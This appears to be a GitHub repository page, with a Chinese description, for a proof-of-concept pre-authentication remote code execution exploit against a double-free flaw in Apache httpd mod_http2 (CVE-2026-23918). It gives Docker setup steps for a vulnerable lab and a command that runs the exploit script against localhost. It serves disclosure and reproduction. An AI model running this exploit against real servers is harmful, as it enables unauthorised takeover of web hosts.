striga-ai/CVE-2026-23918
GitHub: striga-ai/CVE-2026-23918
针对 Apache httpd mod_http2 模块中 double-free 漏洞(CVE-2026-23918)的预认证远程代码执行(RCE)概念验证与复现环境。
Stars: 6 | Forks: 1
# CVE-2026-23918
Apache httpd mod_http2 流清理中的 Double-free 漏洞可导致预认证 RCE。
受影响版本:带有 mod_http2 并使用多线程 MPM (event/worker) 的 httpd 2.4.66。
已在以下版本修复:2.4.67。
由 Bartlomiej Dmitruk ([striga.ai](https://striga.ai)) 和 Stanislaw Strzalkowski ([isec.pl](https://isec.pl)) 发现并报告。
分析文章:https://striga.ai/research/apache-httpd-mod-http2-double-free
## 环境要求
- Docker
- Python 3
## 使用方法
构建并启动易受攻击的环境:
```
docker build -t httpd-poc .
docker run -d --name httpd-poc --privileged -p 9443:443 httpd-poc
```
获取 `system()` 和 scoreboard 地址:
```
docker exec httpd-poc python3 /getaddr.py 1
```
运行 exploit:
```
python3 poc.py --host localhost --port 9443 \
--cmd 'date >> /tmp/win' --workers 64 \
--system --scoreboard
```
验证(执行具有概率性,可能需要几分钟到几小时不等):
```
docker exec httpd-poc cat /tmp/win
```
## 清理
```
docker rm -f httpd-poc
```
标签:Apache httpd, CISA项目, CVE-2026-23918, Docker, Double-Free, HTTP/2, Maven, mod_http2, PoC, Pre-Auth RCE, Python, RCE, 内存破坏, 双重释放, 多线程MPM, 安全防御评估, 攻击脚本, 数据展示, 无后门, 无需认证, 暴力破解, 漏洞复现, 漏洞验证, 红队, 编程工具, 网络安全, 请求拦截, 远程代码执行, 逆向工具, 隐私保护